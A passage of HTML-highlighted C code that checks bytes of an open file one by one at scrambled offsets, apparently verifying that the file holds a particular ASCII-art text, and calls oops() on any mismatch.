<span>fseek</span>(fp,<span>334</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>632</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>444</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>466</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>639</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>159</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>497</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>161</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>635</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>365</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>325</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>323</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>295</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>662</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>500</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>691</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>551</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>223</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>284</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>176</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>198</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>575</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>224</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>156</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>84</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>563</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>363</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>637</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>278</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>550</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>650</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>557</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>167</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>58</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>89</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>308</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>2</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>426</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>469</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>568</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>601</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>190</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>322</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>174</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>372</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>602</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>303</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>690</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>276</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>241</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>404</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>569</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>234</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>507</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>411</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>612</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>253</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>726</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>381</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>536</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>227</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>119</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>403</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>50</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>328</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>717</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>56</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>34</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>107</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>607</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>184</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>291</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>410</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>580</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>383</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>153</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>578</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>541</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>283</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>247</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>346</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>533</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>146</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>47</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>386</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>201</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>301</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>46</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>135</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>678</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>293</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>5</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>588</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>687</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>606</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>640</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>577</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>16</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>126</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>285</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>418</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>594</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>47</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>77</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>46</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>347</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>11</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>185</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>370</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>249</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>331</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>83</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>675</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>9</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>445</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>10</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>171</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>76</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>539</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>573</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>448</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>495</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>661</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>419</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>39</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>724</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>47</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>51</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>145</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>47</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>722</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>220</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>44</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>289</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>79</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>397</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>128</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>671</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>53</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>110</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>616</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>434</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>665</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>166</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>131</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>516</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>379</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>369</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>168</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>271</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>629</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>40</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>621</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>32</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>427</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>677</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>517</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>600</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>547</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>105</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>653</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>265</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>553</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>663</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>565</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>244</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>255</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>304</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>524</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>609</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>590</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>169</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>527</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>389</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>546</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>424</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>136</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>425</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>549</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>307</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>226</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>96</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>13</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>693</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>349</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>1</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>525</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>342</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>522</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>292</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>71</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>694</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>559</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>613</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>337</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>685</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>552</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>480</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>391</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>519</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>10</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>417</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>356</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>561</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>318</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>311</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>10</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>207</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>10</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>33</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>684</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>187</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>464</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>447</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>670</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>498</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} 